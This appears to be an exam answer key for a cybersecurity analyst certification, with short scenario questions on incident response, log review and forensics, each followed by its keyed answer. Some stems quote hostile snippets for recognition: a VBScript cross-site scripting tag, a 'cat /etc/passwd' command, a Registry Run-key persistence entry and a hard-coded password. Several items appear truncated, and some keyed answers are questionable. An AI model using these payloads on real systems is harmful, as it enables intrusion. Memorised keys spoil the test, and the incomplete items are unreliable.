Which of the following best describes the goal of a tabletop exercise?
To test possible incident scenarios and how to react properly
A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is most likely the cause of the server issue?
The digital certificate on the web server was self-signed
A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
Log entry 4: requestObj = …{scopes: [“Mail.ReadWrite”, “Mail.send”, “Files.ReadWrite.All”]}
Which of the following log entries provides evidence of the attempted exploit?
Log entry 4
A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
Determine the asset value of each system
A security analyst is reviewing the following alert that was triggered by FIM on a critical system:
Key added
RunMe
(%ppdata%\abc.exe)
Which of the following best describes the suspicious activity that is occurring?
A new program has been set to execute on system start
Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2AM and 4AM?
SLA
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
Beaconing
An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements?
- Deploy EDR (Endpoint detection response) on the web server and the database server to reduce the adversary’s capabilities.
- Use microsegmentation to restrict connectivity to/from the web and database servers.
An incident response team member is triaging a Linux server. The output is shown below:
cat /etc/passwd
Which of the following is the adversary most likely trying to do?
Execute commands through an unsecured service account
A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:
getConnection (database01, “alpha” , “AxTv.127GdCx94GTd”);
Which of the following is the most likely vulnerability in this system?
Hard-coded credential
A technician is analyzing output from a popular network mapping tool for a PCI audit:
ssl-enum-ciphers:
ciphers all marked as “F”
Which of the following best describes the output?
The host is allowing insecure cipher suites
A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
SOAR
An employee is suspected of misusing a company issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
Make a forensic image of the device and create a SHA-1 hash
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
nation-state
A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
Registry
While reviewing web server logs, a security analyst found the following lline:
< IMG SRC=’vbscript:msgbox(“test”)’>
Which of the following malicious activities was attempted?
Cross-site scripting
